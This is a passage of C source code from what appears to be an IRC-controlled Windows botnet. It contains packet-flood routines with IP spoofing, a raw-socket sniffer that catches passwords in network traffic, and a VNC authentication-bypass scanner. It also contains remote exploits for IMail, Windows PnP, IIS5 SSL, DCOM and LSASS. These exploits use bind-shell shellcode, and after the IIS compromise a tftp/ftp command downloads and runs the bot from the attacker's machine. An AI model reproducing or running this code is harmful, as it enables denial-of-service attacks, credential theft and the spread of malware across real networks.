_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
DWORD WINAPI AdvScanner(LPVOID param)
{
char buffer[LOGLINE];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->gotinfo = TRUE;
advinfo[scan.threadnum].ip = finet_addr(scan.ip);
CheckServers(scan);
if (findthreadid(SCAN_THREAD) == 1) {
DeleteCriticalSection(&CriticalSection); // just in case
if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
sprintf(buffer,"Failed to initialize critical section.");
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
return 0;
}
}
advinfo[scan.threadnum].info = TRUE;
for (unsigned int i=1;i<=(scan.threads);i++) {
scan.cthreadid = i;
sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
threads[scan.cthreadnum].parent = scan.threadnum;
if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
while (scan.cgotinfo == FALSE)
Sleep(30);
} else {
sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError());
addlog(buffer);
}
Sleep(30);
}
if (scan.minutes != 0)
Sleep(60000*scan.minutes);
else
while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
IN_ADDR in;
in.s_addr = advinfo[scan.threadnum].ip;
sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes);
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
advinfo[scan.threadnum].info = FALSE;
Sleep(3000);
if (findthreadid(SCAN_THREAD) == 1)
DeleteCriticalSection(&CriticalSection);
clearthread(scan.threadnum);
ExitThread(0);
}
DWORD WINAPI SniffThread(LPVOID param) {
char sendbuf[IRCLINE], rawdata[65535], *Packet;
int i;
DWORD dwRet, dwMode = 1;
PSNIFF sniff = *((PSNIFF *)param);
PSNIFF *sniffs = (PSNIFF *)param;
sniffs->gotinfo = TRUE;
IPHEADER *ip;
TCPHEADER *tcp;
IN_ADDR sia, dia;
SOCKET sniffsock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(0);
ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));
if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
clearthread(sniff.threadnum);
ExitThread(0);
}
threads[sniff.threadnum].sock = sniffsock;
if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
while(1) {
memset(rawdata, 0, sizeof(rawdata));
Packet = (char *)rawdata;
if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
_snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
break;
}
ip = (IPHEADER *)Packet;
if (ip->proto == 6) {
Packet += sizeof(*ip);
tcp = (TCPHEADER *)Packet;
sia.S_un.S_addr = ip->sourceIP;
dia.S_un.S_addr = ip->destIP;
if (tcp->flags == 24) {
Packet += sizeof(*tcp);
if (strstr(Packet, "[PSNIFF]") == NULL) {
for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) {
if (strstr(Packet, pswords[i].text)) {
_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s",
ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE);
printf("%s\n",sendbuf);
addlog(sendbuf);
break;
}
}
}
}
}
}
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
BOOL iMail( char *target, void* conn,EXINFO exinfo )
{
IRC* irc=(IRC*)conn;
char szBanner[512];//, szShellcode[512];
int iRemoteTarget;
int ibindsize=405;
SOCKET sSocket;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500);
SOCKADDR_IN sinSockAddrIn;
memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn));
sinSockAddrIn.sin_family = AF_INET;
sinSockAddrIn.sin_addr.s_addr = finet_addr(exinfo.ip);
sinSockAddrIn.sin_port = fhtons(exinfo.port);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500);
if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL)))
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500);
if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500);
if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500);
if (strstr(szBanner,"IMail 7.04"))
iRemoteTarget = 0;
else if (strstr(szBanner,"IMail 7.05"))
iRemoteTarget = 1;
else if (strstr(szBanner,"IMail 7.06"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.07"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.10"))
iRemoteTarget = 3;
else if (strstr(szBanner,"IMail 7.11"))
iRemoteTarget = 4;
else if (strstr(szBanner,"IMail 7.12"))
iRemoteTarget = 5;
else if (strstr(szBanner,"IMail 7.13"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.14"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.15"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 8.00"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.01"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.02"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.03"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.04"))
iRemoteTarget = 8;
else if (strstr(szBanner,"IMail 8.05"))
iRemoteTarget = 9;
else if (strstr(szBanner,"IMail 8.10"))
iRemoteTarget = 10;
else if (strstr(szBanner,"IMail 8.11"))
iRemoteTarget = 12;
else if (strstr(szBanner,"IMail 8.12"))
iRemoteTarget = 13;
else if (strstr(szBanner,"IMail 8.13"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.14"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.15"))
iRemoteTarget = 15;
else
iRemoteTarget = -1;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500);
memcpy(szImailPacket + 12, bindshell, ibindsize -1);
if (iRemoteTarget == -1) return FALSE;
if (pImailTargets[iRemoteTarget].iSEHAddress == 0)
memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4);
else
if (pImailTargets[iRemoteTarget].iSEHAddress == 1)
memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500);
if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500);
fclosesocket(sSocket);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
} else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
return FALSE;
}
BOOL VNCScanner(EXINFO exinfo) {
char buffer[IRCLINE];
char szClientPacket[] = "\x01";
struct sockaddr_in thataddr;
int res;
SOCKET m_sock;
m_sock = fsocket(PF_INET, SOCK_STREAM, 0);
if (m_sock == INVALID_SOCKET) {
fclosesocket(m_sock);
return FALSE;
}
thataddr.sin_addr.s_addr = finet_addr(exinfo.ip);
thataddr.sin_family = AF_INET;
thataddr.sin_port = fhtons((unsigned short)exinfo.port);
res = fconnect(m_sock, (LPSOCKADDR) &thataddr, sizeof(thataddr));
if (res == SOCKET_ERROR) {
fclosesocket(m_sock);
return FALSE;
}
//connected
//now lets negotiate protocol
rfbProtocolVersionMsg pv;
if (!ReadExact(m_sock, pv, sz_rfbProtocolVersionMsg)) {
closesocket(m_sock);
return FALSE;
}
pv[sz_rfbProtocolVersionMsg] = 0;
int m_majorVersion, m_minorVersion;
if (sscanf(pv,rfbProtocolVersionFormat,&m_majorVersion,&m_minorVersion) != 2) {
closesocket(m_sock);
return FALSE;
}
if (!(m_majorVersion == 3) && !(m_minorVersion == 8)) {
//Server is not 3.8
closesocket(m_sock);
return FALSE;
}
if (!WriteExact(m_sock, pv, sz_rfbProtocolVersionMsg)) {
closesocket(m_sock);
return FALSE;
}
//auth part
CARD32 authScheme, authResult;
// CARD8 challenge[CHALLENGESIZE];
//we expect to get 2 bytes
if (!ReadExact(m_sock, (char *)&authScheme, 2)) {
closesocket(m_sock);
return FALSE;
}
//return clientpacket
if (!WriteExact(m_sock, szClientPacket, 1)) {
closesocket(m_sock);
return FALSE;
}
if (ReadExact(m_sock, (char *) &authResult, 4)) {
authResult = Swap32IfLE(authResult);
switch (authResult) {
case rfbVncAuthOK:
{
rfbServerInitMsg m_si;
//send non-shared session request and receive data
if (WriteExact(m_sock, (char *) useShared, sz_rfbClientInitMsg) &&
ReadExact(m_sock, (char *) &m_si, sz_rfbServerInitMsg)) {
//lets get desktop name
m_si.framebufferWidth = Swap16IfLE(m_si.framebufferWidth);
m_si.framebufferHeight = Swap16IfLE(m_si.framebufferHeight);
m_si.format.redMax = Swap16IfLE(m_si.format.redMax);
m_si.format.greenMax = Swap16IfLE(m_si.format.greenMax);
m_si.format.blueMax = Swap16IfLE(m_si.format.blueMax);
m_si.nameLength = Swap32IfLE(m_si.nameLength);
TCHAR *m_desktopName;
m_desktopName = new TCHAR[m_si.nameLength + 2];
ReadString(m_sock, m_desktopName, m_si.nameLength);
_snprintf(buffer, sizeof(buffer), "VNC%d.%d %s: %s - [AuthBypass]",
m_majorVersion, m_minorVersion, m_desktopName, exinfo.ip);
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
closesocket(m_sock);
return TRUE;
}
break;
}
default:
{
break;
}
}
}
closesocket(m_sock);
return FALSE;
}
DWORD WINAPI ICMPFloodThread(LPVOID param)
{
ICMPFLOOD icmpflood = *((ICMPFLOOD *)param);
ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param;
icmpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
static ECHOREQUEST echo_req;
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
if (finet_addr(icmpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[ICMP]: Invalid target IP.");
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(icmpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) {
echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long));
echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST));
echo_req.ipHeader.ident=1;
echo_req.ipHeader.frag_and_flags=0;
echo_req.ipHeader.ttl=128;
echo_req.ipHeader.proto=IPPROTO_ICMP;
echo_req.ipHeader.checksum=0;
echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock))));
echo_req.ipHeader.destIP=ssin.sin_addr.s_addr;
echo_req.icmpHeader.type = rand()%256;
echo_req.icmpHeader.subcode = rand()%256;
echo_req.icmpHeader.id = (rand() % 240) + 1;
echo_req.icmpHeader.checksum = 0;
echo_req.icmpHeader.seq = 1;
//fill the packet data with a random character..
memset(echo_req.cData, rand()%255, sizeof(echo_req.cData));
if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
SOCKADDR_IN addr;
int len;
int sockfd;
unsigned short smblen;
char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
IRC* irc=(IRC*)conn;
BOOL success=FALSE;
char* thisTarget;
int pnpbindsize=405;
int TargetOS, Target;
char* tOS="";
WSADATA wsa;
fWSAStartup(MAKEWORD(2,0), &wsa);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;
thisTarget = exinfo.ip;
TargetOS=FpHost(thisTarget,FP_NP);
if (TargetOS==OS_UNKNOWN)
TargetOS=FpHost(thisTarget,FP_SMB);
if (TargetOS == OS_WINNT){
Target=OS_WINNT;
success=FALSE;
}else if (TargetOS==OS_WINXP){
Target=OS_WINXP;
success=FALSE;
}else if (TargetOS==OS_WIN2K){
Target=OS_WIN2K;
success=TRUE;
}else{
success=FALSE;
}
ZeroMemory(&addr,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = finet_addr(thisTarget);
addr.sin_port = fhtons((unsigned short)exinfo.port);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
convert_name((char *)ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// Start prepare header -- dETOX mod --
memcpy(RPC_call + 260, Offsets[OffNum], 4);
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
memcpy(ptr,bindshell,pnpbindsize-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
frecv(sockfd, recvbuf, 4096, 0);
if (!exinfo.silent && exinfo.verbose){
switch(Target){
case 1:
tOS="WINNT";
break;
case 2:
tOS="WIN2K";
break;
case 3:
tOS="WINXP";
break;
default:
tOS="UNKNOWN/2K3/LINUX";
break;
}
irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
}
// if(success){
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// }
return TRUE;
}
BOOL IIS5SSL(EXINFO exinfo)
{
char buffer[IRCLINE];
char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
unsigned long XOR=0xffffffff;
unsigned long offsets[] = {
0x6741a1cd, // Win2K SP0
0x6741a199, // Win2K SP1
0x6741a426, // Win2K SP2
0x67419e1d, // Win2K SP3
0x67419ce8, // Win2K SP4
0x0ffb7de9, // WinXP SP0
0x0ffb832f // WinXP SP1
};
BOOL bRet = FALSE;
unsigned char *badbuffer=(unsigned char*)malloc(347);
memset(badbuffer, 0, 347);
unsigned char *p=badbuffer;
memcpy(p, request, sizeof(request));
p+=sizeof(request)-1;
strcat((char*)p, jumper);
strcat((char*)p, bind_shell_code);
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
// FIX ME: since i didnt found a way to determine the remote OS, i
// placed this all together in a loop. this aint the best way
// i'm sure about that
for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) {
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
offsets[i]^=XOR;
strncat((char*)p, (char*)&offsets[i], 4);
strcat((char*)p, shellcode);
if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) {
Sleep(1000);
fclosesocket(sSock);
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(1981);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
char cmd_buff[400];
#ifndef NO_TFTPD
_snprintf(cmd_buff, sizeof (cmd_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(cmd_buff, sizeof (cmd_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
#endif
if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) {
Sleep(500);
if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) {
fclosesocket(sSock);
bRet = TRUE;
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
break;
}
}
}
}
}
fclosesocket(sSock);
}
}
return (bRet);
}
BOOL dcom(EXINFO exinfo)
{
char sendbuf[IRCLINE];
if (exinfo.port == 445) {
NETRESOURCEW nr;
if (!ConnectViaNullSession(exinfo.ip, &nr))
return FALSE;
else {
char szPipePath[MAX_PATH];
sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);
HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
CloseNullSession(exinfo.ip);
return FALSE;
}
// sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip);
// irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
int TargetOS = FpHost(exinfo.ip, FP_PORT5K);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
if (!reqbuf) {
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
unsigned long lWritten;
char *szInBuf = (char *)malloc(100000);
memset(szInBuf, 0, 100000);
// send the bind string
DWORD dwRead;
TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
if (szInBuf[2] != 0x0C) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
// send the evil request
if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
free(szInBuf);
free(reqbuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
return FALSE;
}
BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL);
free(reqbuf);
free(szInBuf);
CloseHandle(hFile);
CloseNullSession(exinfo.ip);
if (Result == TRUE) {
return FALSE;
}
}
} else { // port 135 and others
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if (TargetOS == OS_WINNT)
return FALSE;
// get a funky fresh socket
SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (sSocket == SOCKET_ERROR)
return FALSE;
// fill in sockaddr and resolve the host
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
// get shellcode
DWORD reqbufsize;
char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
if (!reqbuf) {
fclosesocket(sSocket);
return FALSE;
}
// connect to the server
int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
if (iErr == -1) { // connect failed, exit
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// send the bind string
if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
char recvbuf[4096];
frecv(sSocket, recvbuf, 4096, 0);
// Send the evil request
if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
// read reply
if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) {
free(reqbuf);
fclosesocket(sSocket);
return FALSE;
}
free(reqbuf);
// Close the socket
fclosesocket(sSocket);
}
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip);
for (int i=0; i < 6; i++) {
if (searchlog(sendbuf)) {
sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice);
addlog(sendbuf);
exploit[exinfo.exploit].stats++;
break;
}
Sleep(5000);
}
return TRUE;
}
BOOL lsass2(EXINFO exinfo)
{
int i, targetx, len, targetxOS;
char hostipc[40];
char hostipc2[40*2];
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(reqx4)+20];
char screq[BUFSIZE+sizeof(reqx7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
char buffer[IRCLINE], cmd_buff[400];
char smblen;
char unclen;
unsigned short port;
SOCKET sSocket, bSocket;
SOCKADDR_IN ssin, bsin;
targetxOS = FpHost(exinfo.ip, FP_RPC);
if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
return FALSE;
if (targetxOS == OS_WINXP)
targetx = 0;
else if (rand() % 10)
targetx = 1;
else
targetx = 2;
_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, reqx4, sizeof(reqx4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
if ((targetx == 1) || (targetx == 2)) {
